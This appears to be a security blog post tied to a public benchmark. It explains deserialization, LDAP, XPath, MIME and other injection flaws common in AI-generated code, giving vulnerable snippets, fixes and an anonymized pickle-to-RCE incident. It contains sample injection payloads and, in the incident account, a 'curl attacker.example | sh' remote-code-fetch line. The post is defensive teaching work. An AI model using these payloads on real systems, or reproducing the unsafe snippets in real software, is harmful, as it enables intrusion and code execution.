INSECURE DESERIALIZATION AND LONG-TAIL INJECTIONS
SQL injection gets all the press. The other injection classes are still alive and well in AI-generated code, and the model frequently picks the unsafe primitive because the safe one is more verbose.
The scenario referenced below runs on gapbench.vibe-eval.com — a public security benchmark we operate.
The injection family beyond SQL
SQL injection has a brand. People know about it. Frameworks default to parameterized queries. Most AI-generated SQL is, accidentally, safe — because Prisma, Drizzle, and the modern ORMs make the safe path the default.
The injection family beyond SQL is less famous and less defaulted-safe. Pickle, LDAP, XPath, MIME, NoSQL, template engines (SSTI). Each has its own gotcha. AI generators reproduce them because the safe pattern requires knowing about the unsafe pattern, and the unsafe pattern is shorter.
I’ll cover four; gapbench has more.
Insecure deserialization
import pickle
@app.route('/restore', methods=['POST'])
def restore():
data = pickle.loads(request.data)
return jsonify(restored=str(data))
pickle.loads will execute arbitrary code from a crafted byte string. Tools to generate the payload exist (ysoserial.py for Python, ysoserial for Java). Send the payload, code runs.
The fix: don’t use pickle for untrusted input. Use JSON. If you specifically need pickle for performance reasons, sign the payload (HMAC) and verify before deserializing — and even then, prefer not to.
Same shape applies to:
- Java
ObjectInputStream— use Jackson or similar with explicit type allow-lists. - PHP
unserialize— avoid for untrusted input; usejson_decode. - Ruby
Marshal.load— avoid; use JSON. - .NET
BinaryFormatter— Microsoft has explicitly deprecated this for the same reason.
Live: https://gapbench.vibe-eval.com/site/insecure-deser/.
LDAP filter injection
filter = f"(uid={username})"
results = ldap_client.search(base_dn, ldap.SCOPE_SUBTREE, filter)
Username = *)(uid=*. The filter becomes (uid=*)(uid=*)) (with the trailing ) from the format string), which depending on the LDAP server may match all users. With more creative payloads — *)(|(password=*) — the attacker can probe attributes.
Fix: escape LDAP special characters ((, ), *, \, NUL) in user input before interpolating, or use a parameterized API if your LDAP library has one.
Live: https://gapbench.vibe-eval.com/site/ldap-injection/.
XPath tautology
const query = `//users/user[username='${input}' and password='${pass}']`
const result = xmlDoc.evaluate(query, ...)
Username = ' or '1'='1. The query becomes //users/user[username='' or '1'='1' and password=''], which matches the first user. With more creativity, attacker reads arbitrary XML content.
Fix: parameterized XPath via XPathExpression with variable bindings, or escape user input. Don’t concatenate.
Live: https://gapbench.vibe-eval.com/site/xpath-injection/.
SMTP MIME injection
def send_email(to, subject, body):
msg = f"To: {to}\r\nSubject: {subject}\r\nFrom: noreply@example.com\r\n\r\n{body}"
smtp.sendmail(...)
To = victim@example.com\r\nBcc: attacker@example.com. The attacker is now BCC’d on every email sent to that address. Or the attacker can inject Subject: Free iPad\r\n\r\nClick here to claim to send their own emails through your service.
Fix: use a proper email library (smtplib.MIMEText, nodemailer, etc.) that handles MIME structure correctly. Validate that user-supplied addresses don’t contain \r or \n.
Live: https://gapbench.vibe-eval.com/site/email-mime-injection/.
Bonus mentions
For completeness, these have their own scenarios:
- SQL injection at
/site/sqli-raw/. Yes, AI still produces raw SQL with string concatenation, especially in code that mixes ORM calls with “just one quick raw query.” - NoSQL injection at
/site/nosql-injection/. Mongo’s$whereand operator-based query injection —{ username: { $ne: null } }to bypass auth. - Server-Side Template Injection at
/site/ssti/. Concatenating user input into a Jinja2/Handlebars/etc. template that the engine evaluates.
The shape is the same across all of them: build a query/template/filter from user input without escaping or parameterization, and the user gets to control the structure. The fix is the same: parameterize.
A specific incident — pickle to RCE
Anonymized. A Python data-science SaaS had a feature where users could “save and share their workspace state.” Workspace state was a complex object graph — pandas DataFrames, scikit-learn models, custom transformer classes. The team’s serialization choice: pickle, because it round-trips arbitrary Python objects and JSON wouldn’t.
The save endpoint pickled the workspace state and stored it in S3. The load endpoint pulled the bytes and unpickled. Both endpoints were authenticated.
The bug was that “shared” workspaces — a feature added later — let one user load another user’s pickle. The receiving user didn’t know whose pickle they were loading. An attacker registered, pickled a workspace state containing __reduce__ magic that runs os.system('curl attacker.example | sh') on unpickle, shared it with target users, and waited for them to click the share link.
Three users clicked. Three RCEs. The malicious pickle ran inside the SaaS’s worker, which had access to the S3 bucket and to a few internal services. The attacker pivoted from worker access to S3-write to the team’s container registry, pushed a malicious image, and waited for the next deploy.
The cleanup was extensive. Disable pickle entirely; migrate workspace serialization to a custom JSON-based format that explicitly lists allowed types. Audit S3 for malicious files. Re-deploy from a known-good registry image. Rotate every credential the worker had touched.
The lesson, and it is the lesson for every variant of insecure deserialization: pickle (and Java ObjectInputStream, and PHP unserialize, and Ruby Marshal) is RCE-by-design when used on untrusted input. It’s not a “this could be exploited” — it’s a “this is how the format is intended to work.” If you have user input flowing into pickle.loads, you have RCE. The fix is “don’t use pickle for user input.”
What “untrusted” means in this context
Untrusted = anyone who is not the same trust principal as the code reading the data. In practice:
- Data from a different user, even an authenticated one — untrusted relative to the receiving user
- Data from your own database — untrusted if the database’s contents are influenced by user actions
- Data from an external API — untrusted relative to your service
- Data from cache — only as trusted as whoever can write to the cache
- Data from a file — only as trusted as the file’s source
The general rule: deserialize untrusted input only with formats that don’t allow code execution. JSON, MessagePack, Protobuf, Avro, CBOR are safe. Pickle, ObjectInputStream, unserialize, Marshal, BinaryFormatter, YAML (with some loaders) are not.
A LDAP injection deep-dive
LDAP injection is less common than SQL injection but more catastrophic when it lands, because LDAP is often the auth backend for the entire org.
# WRONG: f-string interpolation
filter = f"(uid={username})"
# username = "*)(uid=*"
# filter = "(uid=*)(uid=*))"
# Some LDAP servers parse this as the OR of multiple conditions
# WRONG: incomplete escaping
def escape(s):
return s.replace('(', '\\28').replace(')', '\\29')
# Misses: *, \, NUL byte, backslash itself
# RIGHT: full LDAP escape per RFC 4515
def ldap_escape(s):
table = str.maketrans({
'\\': r'\5c',
'*': r'\2a',
'(': r'\28',
')': r'\29',
'\x00': r'\00',
})
return s.translate(table)
filter = f"(uid={ldap_escape(username)})"
# BETTER: parameterized search if your library supports it
# python-ldap supports filter substitution; ldap3 supports it explicitly
XPath, LDAP, and email MIME — common shape
All three injection classes share a structure: the application builds a query/filter/header from user input via string concatenation, and special characters in the input change the query’s meaning. The defense is identical in shape — escape per the format’s spec, or use a parameterized API.
The bugs persist because:
- The “escape function” is rarely in the standard library and is finicky to write correctly.
- Parameterized APIs exist but require more setup than string concatenation.
- AI codegen reaches for the shorter pattern, which is the unsafe one.
Cross-stack notes
The same general advice (use a safe deserializer; use parameterized queries; sanitize injection inputs) applies. The libraries that make the right pattern easy:
- Python:
defusedxmlfor XML,defusedjsonis unnecessary (JSON is safe),pyyamlwithsafe_load(notload),pickleshould be avoided for untrusted input. - Java: Jackson with
ObjectMapper().disable(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES)and an explicit type list. AvoidObjectInputStream. - Ruby:
JSON.parseis safe.YAML.safe_loadexists and should be used instead ofYAML.load. - PHP:
json_decodeis safe.unserializeshould not see untrusted input. - .NET: Newtonsoft.Json is safe.
BinaryFormatteris deprecated by Microsoft for security reasons.
How we detect
For each injection family we have a payload set:
- Deser: probe with format-specific exploit payloads (pickle, Java) and observe whether code execution markers appear server-side.
- LDAP: probe with
*)(uid=*)and similar payloads, observe whether response data widens unexpectedly. - XPath: probe with
' or '1'='1payloads against query endpoints, observe whether responses include unexpected data. - MIME: probe with CRLF-in-address payloads, observe whether emails get sent to unexpected destinations.
All runtime. The static scanner story is partial — it can flag the unsafe library calls (pickle.loads, raw f-string LDAP filters, etc.) but can’t confirm exploitability without the request.
CWE / OWASP
- CWE-502 — Deserialization of Untrusted Data
- CWE-90 — Improper Neutralization of Special Elements used in an LDAP Query
- CWE-643 — Improper Neutralization of Data within XPath Expressions
- CWE-93 — Improper Neutralization of CRLF Sequences (MIME)
- OWASP Top 10 — A03:2021 Injection, A08:2021 Software and Data Integrity Failures
Reproduce it yourself
- Insecure deserialization: https://gapbench.vibe-eval.com/site/insecure-deser/
- LDAP injection: https://gapbench.vibe-eval.com/site/ldap-injection/
- XPath injection: https://gapbench.vibe-eval.com/site/xpath-injection/
- Email MIME injection: https://gapbench.vibe-eval.com/site/email-mime-injection/
- SQL injection: https://gapbench.vibe-eval.com/site/sqli-raw/
- NoSQL injection: https://gapbench.vibe-eval.com/site/nosql-injection/
- Template injection (SSTI): https://gapbench.vibe-eval.com/site/ssti/
Related reading
- Pattern: Mass assignment
- Pattern: BOLA in AI-generated CRUD
- Tool: vibe-code-scanner
COMMON QUESTIONS
PROBE THE LONG-TAIL INJECTIONS
We send the deserialization, LDAP, XPath, and MIME payloads that catch the unsafe variants.